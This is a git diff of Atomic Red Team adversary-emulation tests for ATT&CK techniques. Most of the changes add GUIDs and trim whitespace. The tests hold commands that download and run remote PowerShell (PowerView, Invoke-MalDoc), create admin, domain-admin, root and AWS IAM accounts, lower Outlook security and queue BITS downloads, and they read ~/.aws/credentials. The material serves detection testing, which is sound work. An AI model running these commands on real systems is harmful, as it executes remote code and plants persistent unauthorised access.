-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_line | Specified command line to use | string | -Command Start-Sleep 10|
 | file_path | File path or name of process to spawn | path | $Env:windir&#92;System32&#92;WindowsPowerShell&#92;v1.0&#92;powershell.exe|
@@ -198,7 +214,7 @@ Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -217,10 +233,14 @@ Creates a notepad.exe process and then spawns a powershell.exe process as a chil
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2988133e-561c-4e42-a15f-6281e6a9b2db
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_line | Specified command line to use | string | -Command Start-Sleep 10|
 | file_path | File path or name of process to spawn | path | $Env:windir&#92;System32&#92;WindowsPowerShell&#92;v1.0&#92;powershell.exe|
@@ -243,7 +263,7 @@ Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecific
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md
index 4cbe849e..3a6992bb 100644
--- a/atomics/T1135/T1135.md
+++ b/atomics/T1135/T1135.md
@@ -27,10 +27,14 @@ Network Share Discovery
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** f94b5ad9-911c-4eff-9718-fd21899db4f7
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | computer_name | Computer name to find a mount on. | string | computer1|
 
@@ -58,10 +62,14 @@ Network Share Discovery using smbstatus
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 875805bc-9e86-4e87-be86-3a5527315cae
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | package_checker | Package checking command. Debian - dpkg -s samba | string | rpm -q samba|
 | package_installer | Package installer command. Debian - apt install samba | string | yum install -y samba|
@@ -81,7 +89,7 @@ smbstatus --shares
 ##### Description: Package with smbstatus (samba) must exist on device
 ##### Check Prereq Commands:
 ```bash
-if #{package_checker} > /dev/null; then exit 0; else exit 1; fi 
+if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -101,10 +109,14 @@ Upon execution avalaible network shares will be displayed in the powershell sess
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 20f1097d-81c1-405c-8380-32174d493bbb
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | computer_name | Computer name to find a mount on. | string | localhost|
 
@@ -131,6 +143,10 @@ Upon execution, avalaible network shares will be displayed in the powershell ses
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 1b0814d1-bb24-402d-9615-1b20c50733fb
+
+
+
 
 
 
@@ -155,6 +171,10 @@ View information about all of the resources that are shared on the local compute
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** ab39a04f-0c93-4540-9ff2-83f862c385ae
+
+
+
 
 
 
@@ -179,6 +199,10 @@ Enumerate Domain Shares the current user has access. Upon execution, progress in
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** b1636f0a-ba82-435c-b699-0d78794d8bfd
+
+
+
 
 
 
@@ -186,12 +210,25 @@ Enumerate Domain Shares the current user has access. Upon execution, progress in
 
 
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose
 ```
 
 
 
 
+#### Dependencies:  Run with `powershell`!
+##### Description: Endpoint must be joined to domain
+##### Check Prereq Commands:
+```powershell
+if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+"Join system to domain"
+```
+
+
 
 
 <br/>
diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml
index d7558832..ff02d0ae 100644
--- a/atomics/T1135/T1135.yaml
+++ b/atomics/T1135/T1135.yaml
@@ -88,8 +88,17 @@ atomic_tests:
     Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed.
   supported_platforms:
   - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Endpoint must be joined to domain
+    prereq_command: |
+      if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1}
+    get_prereq_command: |
+      "Join system to domain"
   executor:
     command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose
     name: powershell
 
diff --git a/atomics/T1136.001/T1136.001.md b/atomics/T1136.001/T1136.001.md
index ed13f916..de0dfdfd 100644
--- a/atomics/T1136.001/T1136.001.md
+++ b/atomics/T1136.001/T1136.001.md
@@ -27,10 +27,14 @@ Create a user via useradd
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 40d8eabd-e394-46f6-8785-b9bfa1d011d2
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | username | Username of the user to create | String | evil_user|
 
@@ -60,10 +64,14 @@ Creates a user on a MacOS system with dscl
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 01993ba5-1da3-4e15-a719-b690d4f0f0b2
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | username | Username of the user to create | String | evil_user|
 | realname | 'realname' to record when creating the user | String | Evil Account|
@@ -100,10 +108,14 @@ new account, run "net user" in powershell or CMD and observe that there is a new
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 6657864e-0323-4206-9344-ac9cd7265a4f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | username | Username of the user to create | String | T1136.001_CMD|
 | password | Password of the user to create | String | T1136.001_CMD!|
@@ -135,10 +147,14 @@ new account, run "net user" in powershell or CMD and observe that there is a new
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** bc8be0ac-475c-4fbf-9b1d-9fffd77afbde
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | username | Username of the user to create | String | T1136.001_PowerShell|
 
@@ -168,10 +184,14 @@ Creates a new user in Linux and adds the user to the `root` group. This techniqu
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** a1040a30-d28b-4eda-bd99-bb2861a4616c
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | username | Username of the user to create | String | butter|
 | password | Password of the user to create | String | BetterWithButter|
@@ -203,10 +223,14 @@ Creates a new admin user in a command prompt.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** fda74566-a604-4581-a4cc-fbbe21d66559
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | username | Username of the user to create | String | T1136.001_Admin|
 | password | Password of the user to create | String | T1136_pass|
diff --git a/atomics/T1136.002/T1136.002.md b/atomics/T1136.002/T1136.002.md
index cf70f9c5..7ab024da 100644
--- a/atomics/T1136.002/T1136.002.md
+++ b/atomics/T1136.002/T1136.002.md
@@ -21,10 +21,14 @@ Creates a new domain admin user in a command prompt.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** fcec2963-9951-4173-9bfa-98d8b7834e62
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | username | Username of the user to create | String | T1136.002_Admin|
 | password | Password of the user to create | String | T1136_pass123!|
@@ -57,10 +61,14 @@ Create a new account similar to ANONYMOUS LOGON in a command prompt.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** dc7726d2-8ccb-4cc6-af22-0d5afb53a548
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | username | Username of the user to create | String | ANONYMOUS  LOGON|
 | password | Password of the user to create | String | T1136_pass123!|
@@ -91,10 +99,14 @@ Creates a new Domain User using the credentials of the Current User
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5a3497a4-1568-4663-b12a-d4a5ed70c7d7
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | username | Name of the Account to be created | String | T1136.002_Admin|
 | password | Password of the Account to be created | String | T1136_pass123!|
diff --git a/atomics/T1136.003/T1136.003.md b/atomics/T1136.003/T1136.003.md
new file mode 100644
index 00000000..e95db1fc
--- /dev/null
+++ b/atomics/T1136.003/T1136.003.md
@@ -0,0 +1,60 @@
+# T1136.003 - Cloud Account
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1136/003)
+<blockquote>Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
+
+Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - AWS - Create a new IAM user](#atomic-test-1---aws---create-a-new-iam-user)
+
+
+<br/>
+
+## Atomic Test #1 - AWS - Create a new IAM user
+Creates a new IAM user in AWS. Upon successful creation, a new user will be created. Adversaries create new IAM users so that their malicious activity do not interupt the normal functions of the compromised users and can remain undetected for a long time
+
+**Supported Platforms:** Iaas:aws
+
+
+**auto_generated_guid:** 8d1c2368-b503-40c9-9057-8e42f21c58ad
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Username of the IAM user to create in AWS | String | atomicredteam|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+aws iam create-user --user-name #{username}
+```
+
+#### Cleanup Commands:
+```sh
+aws iam delete-user --user-name #{username}
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Check if ~/.aws/credentials file has a default stanza is configured
+##### Check Prereq Commands:
+```sh
+cat ~/.aws/credentials | grep "default"
+```
+##### Get Prereq Commands:
+```sh
+echo Please install the aws-cli and configure your AWS defult profile using: aws configure
+```
+
+
+
+
+<br/>
diff --git a/atomics/T1136.003/T1136.003.yaml b/atomics/T1136.003/T1136.003.yaml
new file mode 100644
index 00000000..4083c296
--- /dev/null
+++ b/atomics/T1136.003/T1136.003.yaml
@@ -0,0 +1,28 @@
+attack_technique: T1136.003
+display_name: 'Create Account: Cloud Account'
+atomic_tests:
+- name: AWS - Create a new IAM user
+  auto_generated_guid: 8d1c2368-b503-40c9-9057-8e42f21c58ad
+  description: |
+    Creates a new IAM user in AWS. Upon successful creation, a new user will be created. Adversaries create new IAM users so that their malicious activity do not interupt the normal functions of the compromised users and can remain undetected for a long time
+  supported_platforms:
+  - iaas:aws
+  input_arguments:
+    username:
+      description: Username of the IAM user to create in AWS
+      type: String
+      default: "atomicredteam"
+  dependencies:
+    - description: |
+        Check if ~/.aws/credentials file has a default stanza is configured
+      prereq_command: |
+        cat ~/.aws/credentials | grep "default"
+      get_prereq_command: |
+        echo Please install the aws-cli and configure your AWS defult profile using: aws configure
+  executor:
+    command: |
+      aws iam create-user --user-name #{username}
+    cleanup_command: |
+      aws iam delete-user --user-name #{username}
+    name: sh
+    elevation_required: false
diff --git a/atomics/T1137.002/T1137.002.md b/atomics/T1137.002/T1137.002.md
index 48f9de53..630447b7 100644
--- a/atomics/T1137.002/T1137.002.md
+++ b/atomics/T1137.002/T1137.002.md
@@ -23,10 +23,14 @@ application is started. Key is used for debugging purposes. Not created by defau
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** c3e35b58-fe1c-480b-b540-7600fb612563
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | thing_to_execute | Thing to Run | Path | C:&#92;Path&#92;AtomicRedTeam.dll|
 
diff --git a/atomics/T1137.004/T1137.004.md b/atomics/T1137.004/T1137.004.md
index 858ef875..28762842 100644
--- a/atomics/T1137.004/T1137.004.md
+++ b/atomics/T1137.004/T1137.004.md
@@ -20,10 +20,14 @@ Triggering the payload requires manually opening Outlook and viewing the targett
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 7a91ad51-e6d2-4d43-9471-f26362f5738e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | url | URL to Outlook Home Page containing the payload to execute (can be local file:// or remote https://) | string | file://PathToAtomicsFolder&#92;T1137.004&#92;src&#92;T1137.004.html|
 | outlook_version | Version of Outlook that is installed | string | 16.0|
diff --git a/atomics/T1137/T1137.md b/atomics/T1137/T1137.md
index 6d0f575f..b765083c 100644
--- a/atomics/T1137/T1137.md
+++ b/atomics/T1137/T1137.md
@@ -21,6 +21,10 @@ Too achieve this two things must happened on the syste
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c
+
+
+
 
 
 
@@ -28,14 +32,14 @@ Too achieve this two things must happened on the syste
 
 
 ```cmd
-reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4
-if not exist  %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ )
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f
+mkdir  %APPDATA%\Microsoft\Outlook\ >nul 2>&1
 echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM
 ```
 
 #### Cleanup Commands:
 ```cmd
-reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f
 del %APPDATA%\Microsoft\Outlook\VbaProject.OTM
 ```
 
diff --git a/atomics/T1137/T1137.yaml b/atomics/T1137/T1137.yaml
index 58a9a9e6..238f7a5b 100644
--- a/atomics/T1137/T1137.yaml
+++ b/atomics/T1137/T1137.yaml
@@ -13,10 +13,10 @@ atomic_tests:
   - windows
   executor:
     command: |
-      reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4
-      if not exist  %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ )
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f
+      mkdir  %APPDATA%\Microsoft\Outlook\ >nul 2>&1
       echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM
     cleanup_command: |
-      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f
+      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f
       del %APPDATA%\Microsoft\Outlook\VbaProject.OTM
     name: command_prompt
diff --git a/atomics/T1140/T1140.md b/atomics/T1140/T1140.md
index 71607740..c4b0d4ed 100644
--- a/atomics/T1140/T1140.md
+++ b/atomics/T1140/T1140.md
@@ -22,10 +22,14 @@ Upon execution a file named T1140_calc_decoded.exe will be placed in the temp fo
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** dc6fe391-69e6-4506-bd06-ea5eeb4082f8
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | executable | name of executable | path | C:&#92;Windows&#92;System32&#92;calc.exe|
 
@@ -57,10 +61,14 @@ Rename certutil and decode a file. This is in reference to latest research by Fi
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 71abc534-3c05-4d0c-80f7-cbe93cb2aa94
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | executable | name of executable/file to decode | path | C:&#92;Windows&#92;System32&#92;calc.exe|
 
diff --git a/atomics/T1176/T1176.md b/atomics/T1176/T1176.md
index 087753e7..4cc5ff74 100644
--- a/atomics/T1176/T1176.md
+++ b/atomics/T1176/T1176.md
@@ -29,6 +29,10 @@ Turn on Chrome developer mode and Load Extension found in the src directory
 **Supported Platforms:** Linux, Windows, macOS
 
 
+**auto_generated_guid:** 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1
+
+
+
 
 
 #### Run it with these steps! 
@@ -55,6 +59,10 @@ Install the "Minimum Viable Malicious Extension" Chrome extension
 **Supported Platforms:** Linux, Windows, macOS
 
 
+**auto_generated_guid:** 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
+
+
+
 
 
 #### Run it with these steps! 
@@ -78,6 +86,10 @@ Create a file called test.wma, with the duration of 30 seconds
 **Supported Platforms:** Linux, Windows, macOS
 
 
+**auto_generated_guid:** cb790029-17e6-4c43-b96f-002ce5f10938
+
+
+
 
 
 #### Run it with these steps! 
@@ -103,6 +115,10 @@ Adversaries may use VPN extensions in an attempt to hide traffic sent from a com
 **Supported Platforms:** Windows, macOS
 
 
+**auto_generated_guid:** 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5
+
+
+
 
 
 #### Run it with these steps! 
diff --git a/atomics/T1197/T1197.md b/atomics/T1197/T1197.md
index d0b70b42..634b81f0 100644
--- a/atomics/T1197/T1197.md
+++ b/atomics/T1197/T1197.md
@@ -28,10 +28,14 @@ and execute a payload
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 3c73d728-75fb-4180-a12f-6712864d7421
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
 | local_file | Local file path to save downloaded file | path | %temp%&#92;bitsadmin1_flag.ps1|
@@ -65,10 +69,14 @@ Upon execution you will find a github markdown file downloaded to the Temp direc
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f63b8bc4-07e5-4112-acba-56f646f3f0bc
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
 | local_file | Local file path to save downloaded file | path | $env:TEMP&#92;bitsadmin2_flag.ps1|
@@ -102,10 +110,14 @@ This job will remain in the BITS queue until complete or for up to 90 days by de
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 62a06ec5-5754-47d2-bcfc-123d8314c6ae
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_path | Path of command to execute | path | C:&#92;Windows&#92;system32&#92;notepad.exe|
 | bits_job_name | Name of BITS job | string | AtomicBITS|
@@ -119,7 +131,7 @@ This job will remain in the BITS queue until complete or for up to 90 days by de
 ```cmd
 bitsadmin.exe /create #{bits_job_name}
 bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
-bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} ""
+bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL
 bitsadmin.exe /resume #{bits_job_name}
 timeout 5
 bitsadmin.exe /complete #{bits_job_name}
@@ -146,10 +158,14 @@ and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windo
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** afb5e09e-e385-4dee-9a94-6ee60979d114
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md|
 | download_path | Local file path to save downloaded file | path | SYSTEMROOT=C:&#92;Windows&#92;Temp|
diff --git a/atomics/T1197/T1197.yaml b/atomics/T1197/T1197.yaml
index c7317d0b..6b16915c 100644
--- a/atomics/T1197/T1197.yaml
+++ b/atomics/T1197/T1197.yaml
@@ -77,7 +77,7 @@ atomic_tests:
     command: |
       bitsadmin.exe /create #{bits_job_name}
       bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file}
-      bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} ""
+      bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL
       bitsadmin.exe /resume #{bits_job_name}
       timeout 5
       bitsadmin.exe /complete #{bits_job_name}
diff --git a/atomics/T1201/T1201.md b/atomics/T1201/T1201.md
index f81368ed..e2953cf8 100644
--- a/atomics/T1201/T1201.md
+++ b/atomics/T1201/T1201.md
@@ -29,6 +29,10 @@ Lists the password complexity policy to console on Ubuntu Linux.
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 085fe567-ac84-47c7-ac4c-2688ce28265b
+
+
+
 
 
 
@@ -53,6 +57,10 @@ Lists the password complexity policy to console on CentOS/RHEL 7.x Linux.
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 78a12e65-efff-4617-bc01-88f17d71315d
+
+
+
 
 
 
@@ -70,7 +78,7 @@ cat /etc/security/pwquality.conf
 ##### Description: System must be CentOS or RHEL v7
 ##### Check Prereq Commands:
 ```bash
-if [ $(rpm -q --queryformat '%{VERSION}') -eq "7" ]; then exit /b 0; else exit /b 1; fi; 
+if [ $(rpm -q --queryformat '%{VERSION}') -eq "7" ]; then exit /b 0; else exit /b 1; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -89,6 +97,10 @@ Lists the password complexity policy to console on CentOS/RHEL 6.x Linux.
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 6ce12552-0adb-4f56-89ff-95ce268f6358
+
+
+
 
 
 
@@ -107,7 +119,7 @@ cat /etc/security/pwquality.conf
 ##### Description: System must be CentOS or RHEL v6
 ##### Check Prereq Commands:
 ```bash
-if [ $(rpm -q --queryformat '%{VERSION}') -eq "6" ]; then exit /b 0; else exit /b 1; fi; 
+if [ $(rpm -q --queryformat '%{VERSION}') -eq "6" ]; then exit /b 0; else exit /b 1; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -126,6 +138,10 @@ Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 7c86c55c-70fa-4a05-83c9-3aa19b145d1a
+
+
+
 
 
 
@@ -150,6 +166,10 @@ Lists the local password policy to console on Windows.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 4588d243-f24e-4549-b2e3-e627acc089f6
+
+
+
 
 
 
@@ -174,6 +194,10 @@ Lists the domain password policy to console on Windows.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 46c2c362-2679-4ef5-aec9-0e958e135be4
+
+
+
 
 
 
@@ -198,6 +222,10 @@ Lists the password policy to console on macOS.
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 4b7fa042-9482-45e1-b348-4b756b2a0742
+
+
+
 
 
 
diff --git a/atomics/T1202/T1202.md b/atomics/T1202/T1202.md
index 4aab2fdb..fb234e50 100644
--- a/atomics/T1202/T1202.md
+++ b/atomics/T1202/T1202.md
@@ -23,10 +23,14 @@ Upon execution, calc.exe should open
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** cecfea7a-5f03-4cdd-8bc8-6f7c22862440
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | payload_path | Path to payload | path | C:&#92;Windows&#92;System32&#92;calc.exe|
 | process | Process to execute | string | calc.exe|
@@ -57,10 +61,14 @@ Upon execution calc.exe will be opened
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | process | Process to execute | string | calc.exe|
 
@@ -89,10 +97,14 @@ Executing it through command line can create process ancestry anomalies
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** cf3391e0-b482-4b02-87fc-ca8362269b29
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | process | Process to execute | string | notepad.exe|
 
diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md
index eda78a1e..0d46e7c3 100644
--- a/atomics/T1204.002/T1204.002.md
+++ b/atomics/T1204.002/T1204.002.md
@@ -37,10 +37,14 @@ References:
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 8bebc690-18c7-4549-bc98-210f7019efff
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | jse_path | Path for the macro to write out the "malicious" .jse file | String | C:&#92;Users&#92;Public&#92;art.jse|
 | ms_product | Maldoc application Word or Excel | String | Word|
@@ -50,7 +54,8 @@ References:
 
 
 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
 $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"cscript.exe #{jse_path}`"`n"
 Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
 ```
@@ -71,7 +76,7 @@ try {
   $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
   Stop-Process -Name $process
   exit 0
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -90,10 +95,14 @@ Uses cscript //E:jscript to download a file
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 3f3af983-118a-4fa1-85d3-ba4daa739d80
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | script_file | File to execute jscript code from | Path | %TEMP%&#92;OSTapGet.js|
 | file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt|
@@ -126,10 +135,14 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0330a5d2-a45a-4272-a9ee-e364411c4b18
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | ms_product | Maldoc application Word or Excel | String | Word|
 
@@ -138,7 +151,8 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
 
 
 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
 $macrocode = "  a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
 Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
 ```
@@ -155,7 +169,7 @@ try {
   $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
   Stop-Process -Name $process
   exit 0
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
